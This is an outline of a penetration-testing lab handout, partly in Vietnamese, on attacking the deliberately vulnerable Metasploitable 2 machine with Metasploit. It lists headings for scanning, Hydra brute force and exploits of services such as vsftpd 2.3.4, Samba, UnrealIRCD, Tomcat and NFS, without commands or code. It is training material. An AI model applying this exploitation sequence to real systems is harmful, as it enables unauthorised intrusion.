Lab 5: KHAI THÁC LỖ HỔNG MẠNG VỚI METASPLOIT

(Exploit Vulnerability with Metasploit)

1. Chuẩn bị

2. Một số khái niệm Metasploit

3. Lấy thông tin máy đích

3.1 Use netdiscover to detect target IP address

3.2 Run nmap to detect opening ports and running services on the target machine.

1
3.3 Network Scan
The first step towards doing what we want to achieve is a service scan that looks at all the 65535 ports of
Metasploitable 2 to see what’s running where and with what version. You will notice the result in the
image below.

4. Metasploit Toolkit for Penetration Testing

4.1 Exploiting Port 21: FTP

We have all our ports and services listed now, let’s start by Exploiting port 21 running FTP. We will be
using Hydra for this. The two wordlists for this operation will have default login names and passwords.

2
4.2 Exploiting VSFTPD 2.3.4

3
4.3 Exploiting Port 22 SSH

4.4 Bruteforce Port 22 SSH (RSA Method)

4.5 Exploiting port 23 TELNET (Credential Capture)

4
4.6 Exploiting TELNET

4.7 Port 25 SMTP User Enumeration

4.8 Twiki (port 80)

5
4.9 Exploiting Port 80 (PHP_CGI)
.

4.10 Exploiting Port 139 & 445 (Samba)

6
4.11 Exploiting Port 8080 (Java)

4.12 PostgreSQL (port 5432)

4.13 Exploiting Port 5432 (Postgres)

7
4.14 Exploiting Port 6667 (UnrealIRCD)

4.15 distccd (port 3632)

4.16 Exploiting Port 36255

8
4.17 Remote Login Exploitation

4.18 Remote Shell Exploitation

9
4.19 Exploiting Distributed Ruby Remote Code Execution (8787) - Ruby DRb RMI (port
8787)

4.20 Bindshell Exploitation

4.21 Exploiting Port 5900 (VNC)

10
4.22 Access Port 2121 (ProFTPD)

4.23 Exploiting Apache Tomcat

use Nikto to scan

11
4.24 Exploiting Port 8180 (Apache Tomcat)

12
4.25 Privilege Escalation via Port 2049: NFS

4.26 Exploiting Port 3306 (MYSQL)

Part 2:
Scanning for Network Services with Metasploit

13
14
 >>
Part 3: Gaining Root from a Vulnerable Service

15